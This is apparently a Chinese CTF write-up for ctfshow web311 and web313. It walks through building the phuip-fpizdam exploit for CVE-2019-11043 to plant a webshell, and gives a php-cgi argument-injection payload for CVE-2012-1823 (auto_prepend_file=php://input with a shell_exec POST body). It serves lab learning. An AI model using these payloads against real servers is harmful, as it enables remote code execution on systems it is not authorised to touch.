ctfshow phpCVE web311&web313

web311

这道题是一个版本漏洞
CVE-2019-11043

这个漏洞工具的使用必须要有go环境哦

php 复制代码
//创建工作空间
mkdir $HOME/go  
如果失败就rm -rf ~/go
//编辑 ~/.bash_profile 文件
vim ~/.bash_profile
//在最后一行添加下面这句。$HOME/go 为你工作空间的路径,你也可以换成你喜欢的路径
export GOPATH=$HOME/go
//保存退出后source一下(vim 的使用方法可以自己搜索一下)
source ~/.bash_profile
// 创建并进入你的第一个工程目录
mkdir -p $GOPATH/src/test && cd $GOPATH/src/test
//下载安装
git clone https://github.com/neex/phuip-fpizdam.git phuip-fpizdam
cd phuip-fpizdam
go get -v && go build
php 复制代码
如果报错如上图,执行命令切换为国内代理:
go env -w GOPROXY=https://goproxy.cn
php 复制代码
./phuip-fpizdam url/index.php 利用工具写入shell,然后密码是a并且是GET传参

web313

CVE-2012-1823

用到的cgi模式下的参数

-s 显示文件源码

-d 指定配置项

然后可以使用-d来指定 auto_prepend_file来制造任意文件漏洞,执行任意代码

php 复制代码
index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
php:input接受输入流
POST:
<?php echo shell_exec("命令");
php 复制代码
<?php
error_reporting(0);
//flag in my disk somewhere,go on!      意思是在我的磁盘somewhere 里面
echo 'where is flag?';
?>
相关推荐
2401_890665862 小时前
免费送源码:Java+ssm+HTML 三分糖——甜品店网站设计与实现 计算机毕业设计原创定制
java·python·微信小程序·html·php·课程设计·android-studio
大G哥13 小时前
PHP标签+注释+html混写+变量
android·开发语言·前端·html·php
傻啦嘿哟13 小时前
HTTP代理基础:网络新手的入门指南
开发语言·php
BXCQ_xuan19 小时前
Typecho博客网站头部SEO优化完整指南
运维·服务器·数据库·php·web
人类群星闪耀时20 小时前
5G赋能远程医疗:从愿景到现实的技术变革
开发语言·5g·php
onejason20 小时前
利用 PHP 爬虫按关键字搜索 1688 商品详情:实战指南
前端·php
foryoufeng1 天前
Laravel代码生成器,快速构建项目代码,统一团队编码风格
php·laravel
亿坊电商2 天前
PHP框架在微服务迁移中能发挥什么作用?
开发语言·微服务·php
帅云毅2 天前
Web漏洞--XSS之订单系统和Shell箱子
前端·笔记·web安全·php·xss
keep intensify2 天前
Linux常用指令
linux·服务器·php